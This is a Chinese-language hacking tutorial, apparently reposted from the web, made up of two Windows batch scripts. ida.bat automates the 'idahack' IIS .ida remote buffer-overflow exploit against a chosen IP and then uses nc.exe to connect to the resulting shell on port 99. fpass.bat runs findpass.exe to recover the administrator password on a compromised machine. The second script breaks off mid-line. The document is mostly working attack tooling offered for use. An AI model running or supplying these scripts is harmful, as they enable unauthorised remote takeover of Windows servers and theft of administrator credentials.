下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的.
___________________ida.bat_________________________________________________
@rem ver 1.0
@if NOT exist %windir%system32idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%system32nc.exe echo "ERROR: dont find nc.exe"
@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2
:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%_tmp
@find "good luck :)" %temp%_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:SP2
@idahack.exe %1 80 %2 99 %temp%_tmp
@type %temp%_tmp
@find "good luck :)" %temp%_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)
:END
_____________________ida.bat__END_________________________________
下面我们再来第二个文件.就是得到administrator的口令.
大多数人说得不到.其实是自己的没有输入正确的信息.
___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%system32findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%system32pulist.exe echo "ERROR: dont find pulist.exe"
@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%_findpass.txt
@goto END
:USAGE
@pulist.exe >%temp%_pass.txt
@findstr.e
本文来源:网络收集 作者:佚名